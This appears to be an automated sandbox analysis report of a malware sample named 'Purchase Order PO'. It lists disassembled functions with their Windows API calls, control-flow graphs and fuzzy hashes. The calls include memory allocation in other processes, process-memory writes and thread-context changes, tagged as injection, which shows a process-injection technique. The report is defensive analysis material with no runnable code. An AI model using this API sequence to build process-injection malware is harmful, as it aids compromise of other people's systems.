                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 02D8B11E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2069510541.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2d80000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID: HandleModule
                                                              • String ID:
                                                              • API String ID: 4139908857-0
                                                              • Opcode ID: 4f5ed20dc5fdb8db64967b321b38b5684f811a6b44484f35c39edb879a50b61c
                                                              • Instruction ID: 61db1c700711144789bbc8f646e4052811598b8c15e1168b0d4e1e51c1f687ab
                                                              • Opcode Fuzzy Hash: 4f5ed20dc5fdb8db64967b321b38b5684f811a6b44484f35c39edb879a50b61c
                                                              • Instruction Fuzzy Hash: 26810370A00B458FD724DF29D4547AABBF5FF88304F108A2AE49AD7B50D735E84ACB91
                                                              Function 02F719C4 Relevance: 1.6, APIs: 1, Instructions: 119COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 706 2f719c4-2f71a36 707 2f71a41-2f71a48 706->707 708 2f71a38-2f71a3e 706->708 709 2f71a53-2f71af2 CreateWindowExW 707->709 710 2f71a4a-2f71a50 707->710 708->707 712 2f71af4-2f71afa 709->712 713 2f71afb-2f71b33 709->713 710->709 712->713 717 2f71b35-2f71b38 713->717 718 2f71b40 713->718 717->718 719 2f71b41 718->719 719->719
                                                              APIs
                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 02F71AE2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2069867675.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2f70000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID: CreateWindow
                                                              • String ID:
                                                              • API String ID: 716092398-0
                                                              • Opcode ID: 81fc6d9570d5d392995e79c0359c7d9a0be4ed20d0b0a4d6ca9ab6181e5d4b32
                                                              • Instruction ID: 1cd52f55bcc8b58877db963529a59df2e023755dc2b6e28ea2534d4437b34b99
                                                              • Opcode Fuzzy Hash: 81fc6d9570d5d392995e79c0359c7d9a0be4ed20d0b0a4d6ca9ab6181e5d4b32
                                                              • Instruction Fuzzy Hash: 0751C1B1D003499FDB14CFA9C884ADEBBB5FF48354F24812AE819AB250D7759885CF90
                                                              Function 02F719D0 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 720 2f719d0-2f71a36 721 2f71a41-2f71a48 720->721 722 2f71a38-2f71a3e 720->722 723 2f71a53-2f71af2 CreateWindowExW 721->723 724 2f71a4a-2f71a50 721->724 722->721 726 2f71af4-2f71afa 723->726 727 2f71afb-2f71b33 723->727 724->723 726->727 731 2f71b35-2f71b38 727->731 732 2f71b40 727->732 731->732 733 2f71b41 732->733 733->733
                                                              APIs
                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 02F71AE2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2069867675.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2f70000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID: CreateWindow
                                                              • String ID:
                                                              • API String ID: 716092398-0
                                                              • Opcode ID: b2473620f6d9dacf0a8b3cef9d45ec8b0cacbef68a2f281230b0f9a69efa9be2
                                                              • Instruction ID: 439c91b339083619210a2ae3e8825ff2c97d2c5aa126e66c2f03e01e0ba741b1
                                                              • Opcode Fuzzy Hash: b2473620f6d9dacf0a8b3cef9d45ec8b0cacbef68a2f281230b0f9a69efa9be2
                                                              • Instruction Fuzzy Hash: 1341B0B1D00349DFDB14CF99C884ADEBBB5BF48354F24812AE919AB250D775A845CF90
                                                              Function 02D8590D Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 734 2d8590d-2d859d9 CreateActCtxA 736 2d859db-2d859e1 734->736 737 2d859e2-2d85a3c 734->737 736->737 744 2d85a4b-2d85a4f 737->744 745 2d85a3e-2d85a41 737->745 746 2d85a60-2d85a90 744->746 747 2d85a51-2d85a5d 744->747 745->744 751 2d85a42-2d85a47 746->751 752 2d85a92-2d85b14 746->752 747->746 751->744
                                                              APIs
                                                              • CreateActCtxA.KERNEL32(?), ref: 02D859C9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2069510541.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2d80000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID: Create
                                                              • String ID:
                                                              • API String ID: 2289755597-0
                                                              • Opcode ID: 67ccbc3a64bcd9b3af3682a6cbe7153ac051075760bd737be10200af51afbb5f
                                                              • Instruction ID: 808a3cf119c3abe14f7b897e0bd165d40903f581d08cc5a2b77c4d19d33f08c9
                                                              • Opcode Fuzzy Hash: 67ccbc3a64bcd9b3af3682a6cbe7153ac051075760bd737be10200af51afbb5f
                                                              • Instruction Fuzzy Hash: 374102B0C00319CBDB24DFA9C884BDDBBF5BF48704F20806AD408AB254DB75694ACF50
                                                              Function 02D844D4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 755 2d844d4-2d859d9 CreateActCtxA 758 2d859db-2d859e1 755->758 759 2d859e2-2d85a3c 755->759 758->759 766 2d85a4b-2d85a4f 759->766 767 2d85a3e-2d85a41 759->767 768 2d85a60-2d85a90 766->768 769 2d85a51-2d85a5d 766->769 767->766 773 2d85a42-2d85a47 768->773 774 2d85a92-2d85b14 768->774 769->768 773->766
                                                              APIs
                                                              • CreateActCtxA.KERNEL32(?), ref: 02D859C9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2069510541.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2d80000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID: Create
                                                              • String ID:
                                                              • API String ID: 2289755597-0
                                                              • Opcode ID: 03a0dcdbd4c09d419f0d7a13f6b873c5c6033530f136a58b4c734fea8975bd68
                                                              • Instruction ID: 66c8c6f4f5dd6ed39b459eebf3d9fe692a0b92fb1b16ca4d0b57dff08a57c0d8
                                                              • Opcode Fuzzy Hash: 03a0dcdbd4c09d419f0d7a13f6b873c5c6033530f136a58b4c734fea8975bd68
                                                              • Instruction Fuzzy Hash: EA41E2B0C0071DCBDB24DFA9C884B9EBBF5BF49704F60806AD409AB255DBB56949CF90
                                                              Function 02F74120 Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 777 2f74120-2f7415c 778 2f74162-2f74167 777->778 779 2f7420c-2f7422c 777->779 780 2f741ba-2f741f2 CallWindowProcW 778->780 781 2f74169-2f741a0 778->781 785 2f7422f-2f7423c 779->785 783 2f741f4-2f741fa 780->783 784 2f741fb-2f7420a 780->784 787 2f741a2-2f741a8 781->787 788 2f741a9-2f741b8 781->788 783->784 784->785 787->788 788->785
                                                              APIs
                                                              • CallWindowProcW.USER32(?,?,?,?,?), ref: 02F741E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2069867675.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2f70000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID: CallProcWindow
                                                              • String ID:
                                                              • API String ID: 2714655100-0
                                                              • Opcode ID: 40e0dee698229094c852ee3123c765a1b8b017b32c1bed63a5ada93ac64d8bc8
                                                              • Instruction ID: 971e07828afa06a48ef90c5132fdce3316113055608161ece9275017a262cb72
                                                              • Opcode Fuzzy Hash: 40e0dee698229094c852ee3123c765a1b8b017b32c1bed63a5ada93ac64d8bc8
                                                              • Instruction Fuzzy Hash: 4C412BB9A002098FDB14DF99C588AAABBF5FF98314F25C459D519AB321D374A841CFA0
                                                              Function 0764F305 Relevance: 1.6, APIs: 1, Instructions: 72injectionCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 791 764f305-764f356 794 764f366-764f3a5 WriteProcessMemory 791->794 795 764f358-764f364 791->795 797 764f3a7-764f3ad 794->797 798 764f3ae-764f3de 794->798 795->794 797->798
                                                              APIs
                                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0764F398
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2073170163.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7640000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessWrite
                                                              • String ID:
                                                              • API String ID: 3559483778-0
                                                              • Opcode ID: ad5a4d991338069e924c151d1813e36efd51673a54f8424459b18d0fb5ae651d
                                                              • Instruction ID: 4fc1adb28ab6507d0e508640d140321d945caf8748394beffa10fd092a46271e
                                                              • Opcode Fuzzy Hash: ad5a4d991338069e924c151d1813e36efd51673a54f8424459b18d0fb5ae651d
                                                              • Instruction Fuzzy Hash: DB2127B59003099FCF10DFAAC985BEEBBF5FF48310F14842AE919A7240C7789944CBA1
                                                              Function 0764F308 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 802 764f308-764f356 804 764f366-764f3a5 WriteProcessMemory 802->804 805 764f358-764f364 802->805 807 764f3a7-764f3ad 804->807 808 764f3ae-764f3de 804->808 805->804 807->808
                                                              APIs
                                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0764F398
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2073170163.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7640000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessWrite
                                                              • String ID:
                                                              • API String ID: 3559483778-0
                                                              • Opcode ID: d23bc3ae84cd3d6a385e9e2c266fb83227d7c97ea8aee8e2ff749678b503aabe
                                                              • Instruction ID: f71e4072ebc3e8ec0dc929b88ad379948b587c98e6dc148ece8c05f7cba1b8d1
                                                              • Opcode Fuzzy Hash: d23bc3ae84cd3d6a385e9e2c266fb83227d7c97ea8aee8e2ff749678b503aabe
                                                              • Instruction Fuzzy Hash: 0A2136B59003099FCF10DFAAC885BEEBBF5FF48310F14842AE919A7240C7789944CBA1
                                                              Function 0764F3F4 Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0764F478
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2073170163.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7640000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessRead
                                                              • String ID:
                                                              • API String ID: 1726664587-0
                                                              • Opcode ID: 62f94bb8e3da111e8c35f8d304f111c0fec353ef8c42f0f7aafe81b543053af5
                                                              • Instruction ID: fd11d95b7c4a5a94ce6839d680512dd4c39e5e7cb09115e099086b19c44cad21
                                                              • Opcode Fuzzy Hash: 62f94bb8e3da111e8c35f8d304f111c0fec353ef8c42f0f7aafe81b543053af5
                                                              • Instruction Fuzzy Hash: BB2139B5C003499FCB10DFAAC941AEEFBF5FF48310F50842AE919A7251CB789545CBA1
                                                              Function 0764E8F8 Relevance: 1.6, APIs: 1, Instructions: 67threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0764E97E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2073170163.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7640000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID: ContextThreadWow64
                                                              • String ID:
                                                              • API String ID: 983334009-0
                                                              • Opcode ID: ce37001a1ebe0229ef7c8c9dd0f44f18b8b204196ca45fb1e1744cc17e103443
                                                              • Instruction ID: a7ef3b47c5470dcd114d2ebc9608f56a8ea0e24f677eff58ed04bfe1fd294ac7
                                                              • Opcode Fuzzy Hash: ce37001a1ebe0229ef7c8c9dd0f44f18b8b204196ca45fb1e1744cc17e103443
                                                              • Instruction Fuzzy Hash: 312137B59002099FDB10DFAAC9857EEBBF4FF49324F10842AD45AA7341CB789945CFA1
                                                              Function 0764F3F8 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0764F478
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2073170163.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7640000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessRead
                                                              • String ID:
                                                              • API String ID: 1726664587-0
                                                              • Opcode ID: 8b1fe0020f21648abb2d30557f22f69bfea6175240b26b80e878549e9e970659
                                                              • Instruction ID: f2782f74dc05fca5cff4ef488175826e363f0d3fab674fe9a373a20944ca3ddd
                                                              • Opcode Fuzzy Hash: 8b1fe0020f21648abb2d30557f22f69bfea6175240b26b80e878549e9e970659
                                                              • Instruction Fuzzy Hash: 0C2139B5C003499FCB10DFAAC840AEEFBF5FF48310F50842AE519A7250C7789544CBA1
                                                              Function 0764E900 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0764E97E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2073170163.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7640000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID: ContextThreadWow64
                                                              • String ID:
                                                              • API String ID: 983334009-0
                                                              • Opcode ID: a0087bee9a06a46f7c11862a7989db4afc412dcd7150e996d7ebad3931472dcc
                                                              • Instruction ID: 2879d0a276a16359b107c7d1a1df3119cdd566e9629e1d43ae52f2f12511ac35
                                                              • Opcode Fuzzy Hash: a0087bee9a06a46f7c11862a7989db4afc412dcd7150e996d7ebad3931472dcc
                                                              • Instruction Fuzzy Hash: 5F2118B19003099FDB10DFAAC8857EEBBF4FF48314F14842AD559A7240DB799945CFA1
                                                              Function 02D8D7A9 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02D8D837
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2069510541.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2d80000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID: DuplicateHandle
                                                              • String ID:
                                                              • API String ID: 3793708945-0
                                                              • Opcode ID: 01736589f83a6ee142fdf31a3cdd7cb1a8dea33d67d3716dbc8d2715f6deea7d
                                                              • Instruction ID: 80c85b03af88d9f6abce5358ca05f3d92906d484bf7bbceeec312146daa12a21
                                                              • Opcode Fuzzy Hash: 01736589f83a6ee142fdf31a3cdd7cb1a8dea33d67d3716dbc8d2715f6deea7d
                                                              • Instruction Fuzzy Hash: BC21E2B5D002489FDB10CFAAD985AEEBFF5FB48310F14805AE958A3350D378A944CFA1
                                                              Function 02D8D7B0 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02D8D837
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2069510541.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2d80000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID: DuplicateHandle
                                                              • String ID:
                                                              • API String ID: 3793708945-0
                                                              • Opcode ID: 761700f5c5b27cf1c41263ab95fd3e5da84fe21d1a64f016d1bbe39b1a50dba8
                                                              • Instruction ID: 22fa451427f5bd05982b146e5f77821f4368bfb0cb633f653e5bf1801cd6526d
                                                              • Opcode Fuzzy Hash: 761700f5c5b27cf1c41263ab95fd3e5da84fe21d1a64f016d1bbe39b1a50dba8
                                                              • Instruction Fuzzy Hash: 1921C2B59002489FDB10DFAAD984ADEBBF9FB48710F14845AE918A3350D378A944CFA5
                                                              Function 0764F245 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0764F2B6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2073170163.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7640000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              • Opcode ID: a2b9c08d747e4bc978d83f7f4c0c6db9dfa11b506f27962d3cb2cfb9cf35583b
                                                              • Instruction ID: 55aec7d88e202f25b8eafc9ffd2a08dcf79a63f83fea7508ef3d59ed636e353e
                                                              • Opcode Fuzzy Hash: a2b9c08d747e4bc978d83f7f4c0c6db9dfa11b506f27962d3cb2cfb9cf35583b
                                                              • Instruction Fuzzy Hash: F11159B68002499FCB10DFAAC844AEFBFF5FF48320F24841AE519A7250C7799540CFA1
                                                              Function 0764E848 Relevance: 1.6, APIs: 1, Instructions: 54threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2073170163.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7640000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID: ResumeThread
                                                              • String ID:
                                                              • API String ID: 947044025-0
                                                              • Opcode ID: 7fcc979983ae0b0c70e55079dc8aac397cf43ca51586b255bb041445f55b20eb
                                                              • Instruction ID: d1c0643a612b124fd376fba92f6eb9ce0f831d7775538cf0d2f0017cf9399000
                                                              • Opcode Fuzzy Hash: 7fcc979983ae0b0c70e55079dc8aac397cf43ca51586b255bb041445f55b20eb
                                                              • Instruction Fuzzy Hash: F61134B59002498FDB20DFAAC4457EEFBF4FF88324F20841AD519A7240CB79A544CBA1
                                                              Function 0764F248 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0764F2B6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2073170163.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7640000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              • Opcode ID: 30eb1e627f534567a244925e464ad6905541ffe59a4cfe0e03700fdd58d37c73
                                                              • Instruction ID: 4599948ee2eb75e2dc3991397ac80f6594b494a9a5c966177b16cd1c5f209aab
                                                              • Opcode Fuzzy Hash: 30eb1e627f534567a244925e464ad6905541ffe59a4cfe0e03700fdd58d37c73
                                                              • Instruction Fuzzy Hash: 33110AB59002499FCB10DFAAC845ADFBFF5FF48314F148419D519A7250C7799544CFA1
                                                              Function 0764E850 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2073170163.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7640000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID: ResumeThread
                                                              • String ID:
                                                              • API String ID: 947044025-0
                                                              • Opcode ID: b9b7f0d1588900d27567ee5303dcd250195c0443b80f1542b4bf0f44c62ad0dd
                                                              • Instruction ID: 1193de09cb27b98370ce1e665a2c9338c1451087ea9fdf64ec0706282563e8d0
                                                              • Opcode Fuzzy Hash: b9b7f0d1588900d27567ee5303dcd250195c0443b80f1542b4bf0f44c62ad0dd
                                                              • Instruction Fuzzy Hash: 0D1125B1D002498FDB20DFAAC4457AEFBF5EF88324F20841AD519A7240CB79A944CBA1
                                                              Function 02D8B0B8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 02D8B11E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2069510541.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2d80000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID: HandleModule
                                                              • String ID:
                                                              • API String ID: 4139908857-0
                                                              • Opcode ID: 835ce1e37be468db97427af8ffe526ea735514178f3025674a1832f5c7e9b3d6
                                                              • Instruction ID: ad640a68df0551f1d68655f464f9d6d7c2fe0b18d4a92ec816499c557c20e58b
                                                              • Opcode Fuzzy Hash: 835ce1e37be468db97427af8ffe526ea735514178f3025674a1832f5c7e9b3d6
                                                              • Instruction Fuzzy Hash: C911E0B6D006498FCB10DF9AD844AEEFBF8EF88714F10845AD869A7310D379A545CFA1
                                                              Function 012FD4C4 Relevance: .1, Instructions: 75COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2069222307.00000000012FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012FD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_12fd000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 34287a482734ac625468956319ce40ee45e16f813ca103668e301ad1895b9e4b
                                                              • Instruction ID: 595eae0e80416938e1826f894021e057f5d92755e39e7aa8cf1c3c674806557a
                                                              • Opcode Fuzzy Hash: 34287a482734ac625468956319ce40ee45e16f813ca103668e301ad1895b9e4b
                                                              • Instruction Fuzzy Hash: 8821F171510248DFDB15DF98E984F26FF65FB88318F20C57DEA090B256C33AD416CAA2
                                                              Function 012FD3D8 Relevance: .1, Instructions: 75COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2069222307.00000000012FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012FD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_12fd000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 34e2c7722c441e6d39fd1800ac388bedf0edd99fa2a6395384b7138cb1f1736e
                                                              • Instruction ID: 6bd2389e56dacb831053a4530f0d97455b403de34183c7e4436a917b92bf06e3
                                                              • Opcode Fuzzy Hash: 34e2c7722c441e6d39fd1800ac388bedf0edd99fa2a6395384b7138cb1f1736e
                                                              • Instruction Fuzzy Hash: 99212175110208DFDB05DF98C9C0B66FF65FB88324F20C17DEA090B256C33AE406CAA2
                                                              Function 02BFD01C Relevance: .1, Instructions: 72COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2069314043.0000000002BFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BFD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2bfd000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: aa22d0a3d67a2634f39f68f55a17b36302db2201a5d04d88ac2ce03bd0569524
                                                              • Instruction ID: 0aed8903a43fc379b96dbd812158f8e579d7a13ee0f211704c2f16b7f1b20495
                                                              • Opcode Fuzzy Hash: aa22d0a3d67a2634f39f68f55a17b36302db2201a5d04d88ac2ce03bd0569524
                                                              • Instruction Fuzzy Hash: 07212271604201DFDB54DF24D990F26BF65FB88314F20C5ADEA0A4B756C33AD40BCA62
                                                              Function 02BFD1D4 Relevance: .1, Instructions: 72COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2069314043.0000000002BFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BFD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2bfd000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 58a07f4f05b26ac946334ccfc4a25ae8bf42a75baa37768fde4ed8690c1594ed
                                                              • Instruction ID: be567dd7908fd11bbc8b06d1759492b166392abb2012fc151dbc10d6281961a6
                                                              • Opcode Fuzzy Hash: 58a07f4f05b26ac946334ccfc4a25ae8bf42a75baa37768fde4ed8690c1594ed
                                                              • Instruction Fuzzy Hash: A0212671604205EFDB45DF24D9C0F26BBA5FB88314F20C5ADEA894B356C33AD44ACBA1
                                                              Function 02BFD006 Relevance: .1, Instructions: 60COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2069314043.0000000002BFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BFD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2bfd000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 76a315967a94d9bec1b04a26cdf9a1511d0c464bde5ba396585943a230517b8d
                                                              • Instruction ID: f4725ef0f7aff7c3eb8c96b2bcd16a2865052e180df5427df14724262303863b
                                                              • Opcode Fuzzy Hash: 76a315967a94d9bec1b04a26cdf9a1511d0c464bde5ba396585943a230517b8d
                                                              • Instruction Fuzzy Hash: 2E21C6755093808FCB06CF20D594715BF71FB45214F28C5EAD9498B697C33AD40ACB62
                                                              Function 012FD4BF Relevance: .1, Instructions: 56COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2069222307.00000000012FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012FD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_12fd000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                              • Instruction ID: a681bcd34c3571144b69ee6d8e64f2a92b478ba331b9d91c15f6aaec3d1d1057
                                                              • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                              • Instruction Fuzzy Hash: D411CD76404284CFCB12CF54D5C4B16BF61FB88214F24C6A9DA490B256C336D45ADBA2
                                                              Function 012FD3D3 Relevance: .1, Instructions: 56COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2069222307.00000000012FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012FD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_12fd000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                              • Instruction ID: 02c20eb2ed356d2717f8a4314d6a0333073dd269cad2358860e9cba239fc3b51
                                                              • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                              • Instruction Fuzzy Hash: 4D11CD76404284CFDB02CF44D5C4B56BF71FB84224F24C6A9DA090A656C33AE45ACBA2
